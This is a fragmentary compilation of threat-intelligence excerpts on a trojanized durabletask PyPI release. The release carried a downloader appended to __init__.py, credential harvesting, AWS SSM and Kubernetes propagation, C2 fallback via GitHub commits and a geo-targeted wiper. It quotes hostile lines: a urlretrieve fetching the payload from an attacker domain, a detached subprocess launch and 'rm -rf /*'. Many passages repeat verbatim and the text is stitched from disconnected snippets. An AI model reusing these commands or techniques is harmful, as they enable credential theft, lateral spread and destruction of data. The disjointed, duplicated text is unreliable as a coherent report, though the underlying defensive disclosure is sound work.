rope.pyz

On May 19, 2026, Endor Labs detected three trojanized versions of durabletask, the official Python SDK for Microsoft's Azure Durable Functions. Versions 1.4.1, 1.4.2, and 1.4.3 of durabletask all contain malicious code that runs on import.

The attacker bypassed the repository's CI/CD pipeline entirely and uploaded directly to PyPI using a compromised publishing token.

TeamPCP's self-replicating malware campaign, known as Mini Shai-Hulud, continues to expand in reach with the compromise of durabletask, an official Microsoft Python client... Three malicious package versions have been identified: 1.4.1, 1.4.2, and 1.4.3.

it uses SendCommand with the AWS-RunShellScript document to execute the rope.pyz payload... and runs it in the background.

May 19 (PyPI Attack)... Payload rope.pyz (28 KB, Python)

Versions 1.4.1, 1.4.2, and 1.4.3 had a Linux-only downloader appended to the package's __init__.py . Unlike the npm packages, which rely on lifecycle scripts, this payload can execute when Python code imports durabletask .

After enumerating SSM-managed instances, it uses SendCommand with the AWS-RunShellScript document to execute the rope.pyz payload on up to 5 other EC2 instances per profile.

subprocess.Popen(["python3", "/tmp/managed.pyz"], stdout=f, stderr=f, stdin=f, start_new_session=True ) ... runs python3 under nohup

subprocess.Popen(["python3", "/tmp/managed.pyz"], stdout=f, stderr=f, stdin=f, start_new_session=True ) ... runs python3 under nohup

The payload domain The second-stage payload is fetched from check.git-service.com. The domain is built to look like routine git tooling traffic in network logs. The file lands at /tmp/managed.pyz with a filename that does not stand out in a directory listing.

Two details in the implementation make this hard to catch at runtime. start_new_session=True detaches the spawned process from its parent. The payload keeps running even after the Python process that triggered the import exits. except: pass catches everything without re-raising.

Versions 1.4.1, 1.4.2, and 1.4.3 had a Linux-only downloader appended to the package's __init__.py . Unlike the npm packages, which rely on lifecycle scripts, this payload can execute when Python code imports durabletask .

The payload attempts brute-force unlock using harvested passwords from environment variables and shell history.

Credential collection Purpose-built collectors target each of the following: AWS: IAM access keys, session tokens... Azure: managed identity tokens... Kubernetes: service account tokens... HashiCorp Vault: VAULT_TOKEN... 1Password: session tokens

Password Managers... harvesting candidate passwords from environment variables... and from shell history entries containing bw unlock or op signin commands... Filesystem... Shell histories: ~/.bash_history, ~/.zsh_history

On AWS, propagation assumes credentials available from the environment or the EC2 instance metadata role.

The malware attempts to extract credentials from: 1Password Bitwarden pass gopass HashiCorp Vault | Targets include: GitHub CLI auth Kubernetes configs Terraform state files Docker configs SSH keys Git credentials VPN configs CI/CD secrets AI developer tooling

The attack planted configuration files that execute a credential-harvesting payload... steals secrets from AWS, Azure, GCP, Kubernetes, and 90+ developer tool configurations.

The payload includes a module called roulette.py, a wiper that runs only on hosts that fingerprint as Israeli or Iranian (timezone/localtime/LANG/locale checks for those regions)

Check CloudTrail for SSM:SendCommand and SSM:DescribeInstanceInformation calls from compromised instances.

The malware attempts to dump: All namespaces All Kubernetes secrets All contexts | It supports: kubectl usage Automatic kubectl download Direct Kubernetes API interaction In-cluster service account auth kubeconfig parsing mTLS API access

The payload includes a module called roulette.py, a wiper that runs only on hosts that fingerprint as Israeli or Iranian (timezone/localtime/LANG/locale checks for those regions)

If it's inside Kubernetes, it propagates through kubectl exec... After enumerating SSM-managed instances, it uses SendCommand with the AWS-RunShellScript document to execute the rope.pyz payload on up to 5 other EC2 instances per profile.

After enumerating SSM-managed instances, it uses SendCommand with the AWS-RunShellScript document to execute the rope.pyz payload on up to 5 other EC2 instances per profile.

The propagation script downloads the payload from the primary C2, falling back to the secondary domain t.m-kosche[.]com, and runs it in the background.

the propagation script downloads the payload from the primary C2, falling back to the secondary domain t.m-kosche[.]com... Also notable is the use of the FIRESCALE mechanism to identify a backup command-and-control (C2) address in the event the primary domain is unreachable.

C2 Domain check.git-service.com ... Backup C2 ... t.m-kosche.com ... Block outbound connections to the exfil endpoints /v1/models , /audio.mp3 , and /api/public/version .

urllib.request.urlretrieve("https://check.git-service.com/rope.pyz", "/tmp/managed.pyz")

If that primary POST fails... the malware falls back to a public dead drop on GitHub. It queries the commit search API with q=FIRESCALE... The first commit message that passes verification becomes the new mothership URL, and the malware retries the identical encrypted POST against that host.

May 19 payload connected to the TeamPCP threat group via the secondary C2 domain t.m-kosche[.]com ... Check network logs for connections to check.git-service[.]com and t.m-kosche[.]com .

Collected credentials are sent to attacker-controlled infrastructure... Primary exfiltration... sends a small JSON body... in a single POST... Backup mothership from GitHub commits... GitHub repository fallback... it creates a new public repository... uploads a file named results.json containing the same RSA-wrapped, AES-encrypted package

The payload includes a module called roulette.py, a wiper... If the check passes, it runs: rm -rf /* That attempts to delete everything on the filesystem.